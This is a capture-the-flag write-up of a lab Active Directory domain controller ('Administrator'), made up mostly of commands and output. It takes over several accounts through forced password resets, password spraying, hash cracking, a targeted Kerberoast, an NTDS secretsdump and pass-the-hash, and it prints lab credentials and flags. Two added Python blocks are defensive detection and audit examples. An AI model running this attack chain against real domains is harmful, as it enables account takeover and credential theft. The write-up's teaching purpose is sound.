Proof of Concept

10.129.4.202

Nmap

PORT     STATE SERVICE
21/tcp   open  ftp
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

Information Gathering

Collecting host information

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.4.202 -u 'Olivia' -p 'ichliebedich' --generate-hosts-file hosts
SMB         10.129.4.202    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.4.202    445    DC               [+] administrator.htb\Olivia:ichliebedich
 
┌──(kali㉿kali)-[~/Administrator]
└─$ cat hosts
10.129.4.202     DC.administrator.htb administrator.htb DC

/etc/hosts file configuration

┌──(kali㉿kali)-[~/Administrator]
└─$ cat /etc/hosts
<SNIP>
10.129.4.202     DC.administrator.htb administrator.htb DC

BloodHound data collection

┌──(kali㉿kali)-[~/Administrator]
└─$ bloodhound-python -d 'administrator.htb' -u 'Olivia' -p 'ichliebedich' -ns 10.129.4.202 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.administrator.htb
<SNIP>
INFO: Querying computer: dc.administrator.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc00000ac - STATUS_PIPE_NOT_AVAILABLE - An instance of a named pipe cannot be found in the listening state.
INFO: Done in 00M 32S
INFO: Compressing output into 20260128173820_bloodhound.zip

Initial Access

Olivia / ichliebedich

WinRM authentication succeeded with the provided account

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc winrm 10.129.4.202 -u 'Olivia' -p 'ichliebedich'
WINRM       10.129.4.202    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.4.202    5985   DC               [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)

WinRM login

┌──(kali㉿kali)-[~/Administrator]
└─$ evil-winrm -i 10.129.4.202 -u 'Olivia' -p 'ichliebedich'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents>

Auth as MICHAEL

Checked BloodHound

Changed the MICHAEL account's password to “1q2w3e4r”

┌──(kali㉿kali)-[~/Administrator]
└─$ bloodyAD -d 'administrator.htb' -u 'Olivia' -p 'ichliebedich' --host administrator.htb set password MICHAEL 1q2w3e4r
[+] Password changed successfully!

SMB authentication succeeded with the changed password

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.4.202 -u 'michael' -p '1q2w3e4r'
SMB         10.129.4.202    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.4.202    445    DC               [+] administrator.htb\michael:1q2w3e4r

Auth as BENJAMIN

Checked BloodHound

Changed the BENJAMIN account's password to “1q2w3e4r”

┌──(kali㉿kali)-[~/Administrator]
└─$ bloodyAD -d 'administrator.htb' -u 'MICHAEL' -p '1q2w3e4r' --host administrator.htb set password BENJAMIN 1q2w3e4r
[+] Password changed successfully!

SMB authentication succeeded with the changed password

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.4.202 -u 'benjamin' -p '1q2w3e4r'
SMB         10.129.4.202    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.4.202    445    DC               [+] administrator.htb\benjamin:1q2w3e4r

Auth as EMILY

FTP authentication succeeded with benjamin:1q2w3e4r

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc ftp administrator.htb -u users.txt -p '1q2w3e4r' -t 100 --continue-on-success
FTP         10.129.4.202    21     administrator.htb [-] Administrator:1q2w3e4r (Response:530 User cannot log in.)
FTP         10.129.4.202    21     administrator.htb [-] Guest:1q2w3e4r (Response:530 User cannot log in.)
FTP         10.129.4.202    21     administrator.htb [-] krbtgt:1q2w3e4r (Response:530 User cannot log in.)
FTP         10.129.4.202    21     administrator.htb [-] olivia:1q2w3e4r (Response:530 User cannot log in.)
FTP         10.129.4.202    21     administrator.htb [-] michael:1q2w3e4r (Response:530 User cannot log in, home directory inaccessible.)
FTP         10.129.4.202    21     administrator.htb [+] benjamin:1q2w3e4r

FTP login with the benjamin account

┌──(kali㉿kali)-[~/Administrator]
└─$ ftp 10.129.4.202
Connected to 10.129.4.202.
220 Microsoft FTP Service
Name (10.129.4.202:kali): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

Found the Backup.psafe3 file on the FTP server and retrieved it with get

ftp> ls
229 Entering Extended Passive Mode (|||49764|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
 
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||49767|)
125 Data connection already open; Transfer starting.
100% |**********************************************|   952        4.47 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (4.46 KiB/s)

Cracked Backup.psafe3 and obtained the password

  • tekieromucho

┌──(kali㉿kali)-[~/Administrator]
└─$ hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt --quiet
Backup.psafe3:tekieromucho

Opened Backup.psafe3 with Password Safe and found Emily's password

  • UXLCI5iETUsIBoFVTj8yQFKoHjXmb

SMB authentication succeeded with emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.4.202 -u users.txt -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -t 100
SMB         10.129.4.202    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.4.202    445    DC               [-] administrator.htb\Administrator:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.129.4.202    445    DC               [-] administrator.htb\Guest:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.129.4.202    445    DC               [-] administrator.htb\krbtgt:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.129.4.202    445    DC               [-] administrator.htb\olivia:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.129.4.202    445    DC               [-] administrator.htb\michael:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.129.4.202    445    DC               [-] administrator.htb\benjamin:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE
SMB         10.129.4.202    445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

WinRM authentication succeeded with emily/UXLCI5iETUsIBoFVTj8yQFKoHjXmb

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc winrm 10.129.4.202 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
WINRM       10.129.4.202    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.4.202    5985   DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb (Pwn3d!)

WinRM login succeeded with the emily account

┌──(kali㉿kali)-[~/Administrator]
└─$ evil-winrm -i 10.129.4.202 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents>

Read user.txt

*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
ip219ac16f8ab8dec9d35e16bda64ff3a3
*Evil-WinRM* PS C:\Users\emily\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.4.202
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

Privilege Escalation

Checked BloodHound

  • The user EMILY@ADMINISTRATOR.HTB has generic write access to the user ETHAN@ADMINISTRATOR.HTB.
  • Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user

Performed Kerberoasting and extracted the TGS ticket hash for the ethan account

┌──(kali㉿kali)-[~/Administrator]
└─$ python targetedKerberoast.py -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip 10.129.4.202 -o hash.txt
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Writing hash to file for (ethan)
 
┌──(kali㉿kali)-[~/Administrator]
└─$ cat hash.txt
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$0a9fbc866864f694110383e06dbdf6a1$<SNIP>

Cracked the hash and obtained the plaintext password

  • limpbizkit

┌──(kali㉿kali)-[~/Administrator]
└─$ hashcat hash.txt /usr/share/wordlists/rockyou.txt --quiet
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
 
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
 
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
 
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$0a9fbc866864f694110383e06dbdf6a1$234efc125b3c197d7d37eafd24eaa335859fff536f388969f025b171e48d6f9a3eb54d117928106163f4d50e789e0f84724042197e6d704c5655ee71b39b353879398d597fd242d5fd8138068d6ca5ad1a92d53d6b80fd10c2d2a7d8cf4c267813c6a668ce3b9ac44486da79559f67d2cbdd42a6ee0b55ea45efdda7961cea4e8a14f850eadfe63390cdb6ddf78c1cb04426f77d1de783c75b0310f37a11d3b15a5aed9b4b822e93c1162fad131cfa81a87791e2f75999331c1f32a38cd2e8810fac24722deecf3041551cd9e0bda32e4bcbc0a2cb2b7337f2de5fa21228ea9524b7bd13a59d88fe0b3c709684609fb52721a2a706e93c8596242cc14bde2d1363f3cf043bb8deecc605da6aecf5a4972ba88bab3155f6549966c7c1bb4fd1feec62076959981cde2053f38183a7fcec5278946318bdf235249df86e631ad31fc3b565cd9aa0a7316470702c3c89dfdba074a2c920898840dbd03fe47e731fd295fa46384eb2ddd87f24197c78a583272a01043d1035079b3a86a813c69c35acf1fc574054b4d52aee8b6aeb367410d8e99529eeef9723c33be88fb7ed3a63bd3caca683aa0102dd41d41d29f18d1f7c804b764d425ecf3b557449b59deff521cc8b20c2499aaea75e8089843b229255d6817f6436f730a4f6250064a9694b717482af4d6356c6ea365fcd648eccffbb6abb459064a3351039f9369735f3755eca05de732f2c57745584378287fe4845477b5d626d3bbeb5fad4154c9b6ef44d0d0a0b6c913cc6629d5aafedd008fcc1c6b4674795d34cdeee3a4743092c9378bb62e24baabc5895f41ec527c5f800a0497acb105a3a083644c002cd2feb472058292bf248a33371471551451df1afb4fee45dcbe8f390f7c90d09aab247c3cbdc14df9a34cc368d9e1db9043cbaa5f412543b5ed3017dd231f0ecc64d5004270c42899c30871d37e053738e294e406a77a44ac63bfd54289df32929575f3213c4a3accd58cc48a19cf680aad4787781e0df2ea35450aa8530ffc4fd6cc28f2563eaf719e8f537857634f6913828126218bc6fb18870272be9a8b6a34e9379dce49fee9043e73ef5241806586775f4a04e81864fc57f3b3aa2a0116b387e64a70840d1dba3ecdb5c3873d190c775832c8d920f0be1474aae079150cb68823d4fff7bb3db46430ddf8685799f4ad2220a6bb311ee18f98091859866691836b12bcee8d5cf0b4e924eecd15fe08fefed488e8bc43f984d7b48bb3c66d8542779c25d11c5018c045e4e76bec2aefe97a6a1386dde40b1cbb71a044818a6443dd5b8f37d204d8d9c8e587c23922add1612dcb7db6e3162a487436
3926d6d453eda1c1b710ae31761828c7ad351e2d60f3d9e4893f8e3299d5f3f98a35cd8d2708336eb381a4d0966f5f35349d83bc0e53f547d7d184d3cd90f15ae145ed12df796b05bb1bb8de81cf4668c33369368d83c7ec97dcdd1f8d9492141da2531a3b32b8d00408317010a8aa13f7c3650f3c0cbcb1825dc43e3346352206d502ac68a43:limpbizkit
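Detection logic for the chain shown above (GenericWrite used to write a servicePrincipalName onto a user, then an RC4 service ticket requested for it and cracked offline as hashcat mode 13100, etype 23), added here as an example and not part of the original write-up. The events are constructed and use simplified field names for Windows Security events 5136 (directory object modified) and 4769 (service ticket requested).

```python
from datetime import datetime, timedelta

# Constructed sample events, simplified from Windows Security log fields
# (5136 = directory service object modified, 4769 = TGS requested). Not real logs.
EVENTS = [
    {"id": 5136, "time": "2024-10-05T08:20:01", "subject": "emily", "op": "add",
     "object": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "attribute": "servicePrincipalName"},
    {"id": 4769, "time": "2024-10-05T08:20:04", "subject": "emily",
     "service": "ethan", "etype": 0x17},            # RC4-HMAC: crackable offline
    {"id": 5136, "time": "2024-10-05T08:20:09", "subject": "emily", "op": "delete",
     "object": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "attribute": "servicePrincipalName"},
    {"id": 4769, "time": "2024-10-05T08:25:00", "subject": "olivia",
     "service": "DC$", "etype": 0x12},              # AES256 for a machine SPN: benign
]

RC4_ETYPES = {0x17, 0x18}          # rc4-hmac, rc4-hmac-exp
WINDOW = timedelta(minutes=10)

def _cn(dn):
    """First RDN value of a DN, lower-cased: 'CN=ethan,...' -> 'ethan'."""
    return dn.split(",")[0].split("=", 1)[1].lower()

def find_targeted_kerberoast(events, window=WINDOW):
    """Return one finding per SPN add on a user object that is followed within
    `window` by an RC4 service-ticket request for that same account. Also notes
    whether the SPN was removed again (the cleanup step of a targeted roast)."""
    findings = []
    for add in events:
        if add["id"] != 5136 or add["op"] != "add" \
           or add["attribute"].lower() != "serviceprincipalname":
            continue
        t0, target = datetime.fromisoformat(add["time"]), _cn(add["object"])
        for e in events:
            if e["id"] != 4769 or e["etype"] not in RC4_ETYPES \
               or e["service"].lower() != target:
                continue
            if t0 <= datetime.fromisoformat(e["time"]) <= t0 + window:
                cleaned = any(x["id"] == 5136 and x["op"] == "delete"
                              and _cn(x["object"]) == target for x in events)
                findings.append({"actor": add["subject"], "target": target,
                                 "requester": e["subject"], "spn_removed": cleaned})
                break
    return findings
```

A hit here points at the usual fixes: review who holds GenericWrite on user objects, and move service accounts to AES-only encryption types with long random passwords or gMSAs so an RC4 TGS is neither issued nor crackable.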

Dumped hashes with impacket-secretsdump and obtained the Administrator account's NTLM hash

  • 3dc553ce4b9fd20bd016e098d2d2fd2e

┌──(kali㉿kali)-[~/Administrator]
└─$ impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.4.202
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:68365827d79c4f5cc9b52b688495fd51:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:68365827d79c4f5cc9b52b688495fd51:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
<SNIP>
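A password-hygiene audit over secretsdump-style NTDS lines (domain\user:rid:lmhash:nthash:::), added here as an example and not part of the original write-up. It flags accounts sharing an NT hash, which is what the dump above shows for michael and benjamin after both were set to 1q2w3e4r, plus accounts that still store an LM hash or carry the well-known empty-password NT hash; the dump lines are constructed and the hashes are placeholders.

```python
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

# Constructed sample dump (placeholder hashes, not real credentials).
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
corp.example\\michael:1109:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
corp.example\\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
corp.example\\legacy:1200:ffffffffffffffffffffffffffffffff:22222222222222222222222222222222:::
[*] Cleaning up...
"""

def parse_dump(text):
    """Return (user, rid, lm, nt) tuples; skips status lines that are not hashes."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user = parts[0].split("\\")[-1].lower()      # drop the domain prefix
        rows.append((user, int(parts[1]), parts[2].lower(), parts[3].lower()))
    return rows

def audit(text):
    """Group accounts by NT hash and report reuse, LM storage and empty passwords."""
    rows = parse_dump(text)
    by_nt = defaultdict(list)
    for user, _rid, _lm, nt in rows:
        by_nt[nt].append(user)
    shared = {nt: users for nt, users in by_nt.items()
              if len(users) > 1 and nt != EMPTY_NT}
    lm_present = [u for u, _r, lm, _n in rows if lm != EMPTY_LM]
    empty_nt = [u for u, _r, _l, nt in rows if nt == EMPTY_NT]
    return {"shared": shared, "lm_present": lm_present, "empty_nt": empty_nt}
```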

SMB and WinRM authentication succeeded with the obtained NTLM hash

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.4.202 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
SMB         10.129.4.202    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.4.202    445    DC               [+] administrator.htb\administrator:3dc553ce4b9fd20bd016e098d2d2fd2e (Pwn3d!)
 
┌──(kali㉿kali)-[~/Administrator]
└─$ nxc winrm 10.129.4.202 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
WINRM       10.129.4.202    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.4.202    5985   DC               [+] administrator.htb\administrator:3dc553ce4b9fd20bd016e098d2d2fd2e (Pwn3d!)

WinRM login

┌──(kali㉿kali)-[~/Administrator]
└─$ evil-winrm -i 10.129.4.202 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Read root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
79665f605a832f81f8947e3fc9f6e19d
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.4.202
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1